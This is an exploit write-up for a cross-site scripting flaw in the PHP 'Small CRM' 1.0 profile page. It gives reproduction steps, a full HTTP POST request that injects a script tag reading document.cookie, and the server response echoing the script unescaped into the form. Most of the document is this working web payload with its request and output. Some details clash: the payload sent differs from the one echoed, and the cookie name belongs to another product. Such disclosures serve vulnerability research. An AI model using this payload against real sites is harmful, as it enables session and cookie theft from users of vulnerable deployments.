# Exploit Title: Small CRM Developed using PHP and MySQL - Cross-Site Scripting (Reflected)
# Date: 05.06.2024
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads
# Software Link: https://phpgurukul.com/small-crm-php
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Small CRM Developed System can be attacked with xss with a simple script
# https://www.linkedin.com/in/furkanerentetik/
Steps To Reproduce:
1 - Go to the login page http://localhost/crm/crm/profile.php
2 - Add new record payload= 'name='><script>alert(document.cookie)</script>'
3 - Enter on alert warning appears.
PoC
Request
POST /crm/crm/profile.php HTTP/1.1
Host: localhost
Content-Length: 674
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYFQBlbKN8Nl8KtgW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/crm/crm/profile.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=1
Connection: close
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="name"
"><script>alert(document.cookie)</script>
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="alt_email"
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="phone"
0000000000
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="gender"
m
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="address"
deneme
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW
Content-Disposition: form-data; name="update"
Update
------WebKitFormBoundaryYFQBlbKN8Nl8KtgW--
----------------------------------------------------------------------------------------------
Response
HTTP/1.1 200 OK
Date: Tue, 04 Jun 2024 22:22:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13521
<script>alert('Your profile updated successfully.');</script>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<title>CRM | User Profile</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/jquery-scrollbar/jquery.scrollbar.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
</head>
<body class="">
<div class="header navbar navbar-inverse ">
<div class="navbar-inner">
<div class="header-seperation">
<ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none">
<li class="dropdown"> <a id="main-menu-toggle" href="#main-menu" class="" >
<div class="iconset top-menu-toggle-white"></div>
</a> </li>
</ul>
<a href="dashboard.php" style="color:#FFF; font-size:24px; margin-top:20%;">CRM</a>
<ul class="nav pull-right notifcation-center">
<li class="dropdown" id="header_task_bar"> <a href="dashboard.php" class="dropdown-toggle active" data-toggle="">
<div class="iconset top-home"></div>
</a> </li>
</ul>
</div>
<div class="header-quick-nav" >
<div class="pull-left">
</div>
<div class="pull-right">
<ul class="nav quick-section ">
<li class="quicklinks"> <a data-toggle="dropdown" class="dropdown-toggle pull-right " href="#" id="user-options">
<div class="iconset top-settings-dark "></div>
</a>
<ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options">
<li><a href="profile.php"> My Account</a> </li>
<li class="divider"></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i> Log Out</a></li>
</ul>
</li>
</ul>
</div>
<!-- END CHAT TOGGLER -->
</div>
<!-- END TOP NAVIGATION MENU -->
</div>
<!-- END TOP NAVIGATION BAR -->
</div>
<!-- END HEADER --><div class="page-container row-fluid">
<!-- BEGIN SIDEBAR -->
<div class="page-sidebar" id="main-menu">
<!-- BEGIN MINI-PROFILE -->
<div class="page-sidebar-wrapper scrollbar-dynamic" id="main-menu-wrapper">
<div class="user-info-wrapper">
<div class="profile-wrapper"> <img src="assets/img/user.png" alt="" data-src="assets/img/user.png" data-src-retina="assets/img/user.png" width="69" height="69" /> </div>
<div class="user-info">
<div class="greeting" style="font-size:14px;">Welcome</div>
<div class="username" style="font-size:12px;">fet</div>
<div class="status" style="font-size:10px;"><a href="#">
<div class="status-icon green"></div>
Online</a></div>
</div>
</div>
<!-- END MINI-PROFILE -->
<!-- BEGIN SIDEBAR MENU -->
<p class="menu-title">BROWSE <span class="pull-right"><a href="javascript:;"><i class="fa fa-refresh"></i></a></span></p>
<ul>
<li class="start"> <a href="dashboard.php"> <i class="icon-custom-home"></i> <span class="title">Dashboard</span> <span class="selected"></span> </a>
</li>
<li><a href="change-password.php"><span class="fa fa-file-text-o"></span> Change Password</a></li>
<li><a href="profile.php"><span class="fa fa-user"></span> Profile</a></li>
<li ><a href="get-quote.php"> <span class="fa fa-tasks"></span> Request a Quote</a></li>
<li ><a href="create-ticket.php"><span class="fa fa-ticket"></span> Create Ticket</a></li>
<li ><a href="view-tickets.php"><span class="fa fa-ticket"></span> View Ticket</a></li>
</ul>
<div class="clearfix"></div>
</div>
</div>
<a href="#" class="scrollup">Scroll</a>
<div class="footer-widget">
<div class="progress transparent progress-small no-radius no-margin">
<div data-percentage="79%" class="progress-bar progress-bar-success animate-progress-bar" ></div>
</div>
<div class="pull-right">
</div>
</div>
<div class="page-content">
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="page-title">
<h3>fet's Profile</h3>
<div class="row">
<div class="col-md-12">
<form class="form-horizontal" method="post" enctype="multipart/form-data">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><strong>Your Profile</h3>
<div align="right">
Registration Date :2024-06-05 01:16:29
</div>
</div>
<div class="panel-body">
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Name</label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="name" value=""><script>alert(1)</script>" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Primary Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="email" value="fet@gmail.com" disabled="disabled" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">alternate Email </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="alt_email" value="" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Contact no </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<input type="text" name="phone" value="0000000000" maxlength="10" class="form-control"/>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Gender </label>
<div class="col-md-6 col-xs-12">
<div class="input-group">
<span class="input-group-addon"><span class="fa fa-pencil"></span></span>
<select class="form-control select" name="gender">
<option value="m">Male</option>
<option value="m">Male</option>
<option value="f">Female</option>
<option value="others">Other</option>
</select>
</select>
</div>
</div>
</div>
<div class="form-group">
<label class="col-md-3 col-xs-12 control-label">Address</label>
<div class="col-md-6 col-xs-12">
<textarea class="form-control" name="address" rows="5">"><script>alert(1)</script></textarea>
</div>
</div>
</div>
<div class="panel-footer">
<button class="btn btn-default" type="reset">Clear Form</button>
<input type="submit" value="Update" name="update" class="btn btn-primary pull-right">
</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-scrollbar/jquery.scrollbar.min.js" type="text/javascript"></script>
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
</body>
</html>